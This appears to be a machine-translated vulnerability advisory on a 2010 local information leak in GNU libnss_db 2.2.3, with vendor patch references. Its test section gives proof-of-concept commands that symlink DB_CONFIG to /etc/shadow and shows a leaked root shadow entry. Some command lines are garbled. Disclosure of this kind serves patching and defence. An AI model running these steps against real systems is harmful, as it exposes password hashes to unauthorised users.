GNU libnss_db 2.2.3 local information leakage Vulnerability

Affected Versions:
GNU libnss_db 2.2.3 Vulnerability description:

The nss_db package provides a set of C-library extensions that allow the use of the Berkeley DB database as the primary source for aliases, groups, hosts, networks, protocols, users, RPC, services, and shadow passwords.

When the nss_db database encounters a parsing error, some contents of the DB_CONFIG file may be displayed, local users can link the DB_CONFIG symbol to a restricted file and execute the suid root application of the database to read sensitive information. <* Reference
Https://bugs.launchpad.net/ubuntu/+source/libnss-db/+bug/531976
Https://www.redhat.com/support/errata/RHSA-2010-0347.html
Https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-March/001069.html
*>

Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! Sudo apt-get install libnss-db
Sudo/etc/init. d/nscd stop (in case nscd is installed)
Sudo ln-s/etc/shadow DB_CONFIG
$ Sudo
Line 1: root: *: 14553: 0: 99999: 7: incorrect name-value pair
[...] SEBUG Security suggestions:
Vendor patch:

GNU
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Https://bugs.launchpad.net/ubuntu/+source/libnss-db/+bug/531976

RedHat
------
For this reason, RedHat has released a Security Bulletin (RHSA-2010: 0347-01) and patch:
RHSA-2010: 0347-01: Moderate: nss_db security update
Link: html> https://www.redhat.com/support/errata/RHSA-2010-0347.html

Ubuntu
------
Ubuntu has released a Security Bulletin (USN-922-1) and patches for this:
USN-922-1: libnss-db vulnerability
Link: https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-March/001069.html